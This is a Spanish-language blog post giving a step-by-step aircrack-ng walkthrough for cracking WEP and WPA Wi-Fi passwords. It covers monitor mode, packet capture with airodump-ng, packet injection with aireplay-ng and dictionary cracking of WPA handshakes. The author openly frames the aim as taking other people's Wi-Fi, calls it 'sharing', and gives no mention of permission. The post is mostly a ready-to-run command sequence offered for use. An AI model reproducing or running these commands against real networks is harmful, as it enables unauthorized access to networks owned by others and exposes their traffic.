Wifi aircrack WEP y WPA

Buenas como os prometí aquí están los comandos necesarios para reventar contraseñas Wifi. Como dije en el post anterior relacionado con este tema, ninguna de las redes son seguras, ya que si no es por un método o otro se pueden sacar las contraseñas para poder “robar” (aunque ami no me gusta llamarlo así, yo la llamaría una forma de compartir) Wifi.

Para poder sacar las contraseñas del tipo de encriptado WEP:

  • Abre el terminator, sino lo tienes instalado instalalo con: aptitude install terminator.

  • En este terminal dividelo en cuatro.

  • En el primer terminal, en primer lugar habría que poner la tarjeta de red en modo monitor, para ello utilizaremos los siguientes comandos, por el mismo orden:

    • airmon-ng stop mon0

    • airmon-ng start wlan0

  • A continuación pondremos en funcionamiento el airodump. Necesario para ver las redes disponibles. Para ello se usa el comando:

    • airodump-ng -w * -c Canal mon0

Pues bien el * es el nombre con el que queremos llamar al archivo que se nos va a crear en la carpeta en la que estamos situados.

El Canal se refiere al canal en el que esta la red que queremos reventar su encriptado, el canal lo muestra el airodump

  • En tercer lugar necesitaremos saber la MAC de nuestro equipo, para a continuación poder asociar los paquetes. Para ello usaremos el siguiente comando en el segundo terminal:

    • ifconfig wlan0

  • Ahora deberemos realizar los paquetes que queremos inyectar, para ello usaremos el siguiente comando:

    • aireplay-ng -1 900 -e ESSID -a BSSID -h STATION mon0

    ESSID es el nombre de la red.

    BSSID es la MAC del router al que nos vamos a conectar.

    STATION es nuestra MAC

  • El siguiente paso es asociarlo con nuestro equipo, para poder sacar la contraseña. Para ello pasamos al siguiente terminal y ejecutamos el comando:

    • aireplay-ng -3 -e ESSID -b BSSID -h STATION mon0

  • Una vez asociado deberian de subir las Datas en el airodump.

  • El ultimo comando a utilizar seria:

    • aircrack-ng -x *.cap

    Este comando lo ejecutaremos en el cuarto terminal, para poder ver los demas como funcionan.

  • El * es el nombre que le diéramos al archivo en el paso 4.

Después de esperar el tiempo suficiente, nos sacara la contraseña.

Para reventar el encriptado WPA ya es un poco mas complicado, porque se tienen que dar varios factores. Como por ejemplo que a la vez que estés intentando sacar la contraseña este otro conectado a esa misma red, en la mayoría de las ocasiones el dueño.

Los comandos para sacar estas contraseñas son los mismos que para la encriptacion anterior, salvo el ultimo comando.

Pero aquí llega lo complicado de este tipo de encriptacion, se necesita que otro usuario este conectado a la misma red, para poder conseguir un handshake, imprescindible para poder sacar dicha contraseña.

Después hay que tener los llamados diccionarios de contraseñas, que son archivos de textos donde están las posibles contraseñas de este tipo de contraseñas.

Tiene que coincidir que la contraseña que buscamos este en dichos diccionarios.

El ultimo comando seria:

  • aircrack-ng -w Diccionario -x *.cap

    En el lugar del diccionario se escribiria el nombre con la ruta correspondiente de dicho diccionario.

    * el nombre del archivo creado en el paso 4.

    1. No trackbacks yet.

    Responder

    Introduce tus datos o haz clic en un icono para iniciar sesión:

    Logo de WordPress.com

    Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

    Imagen de Twitter

    Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

    Foto de Facebook

    Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

    Google+ photo

    Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

    Conectando a %s

    A %d blogueros les gusta esto: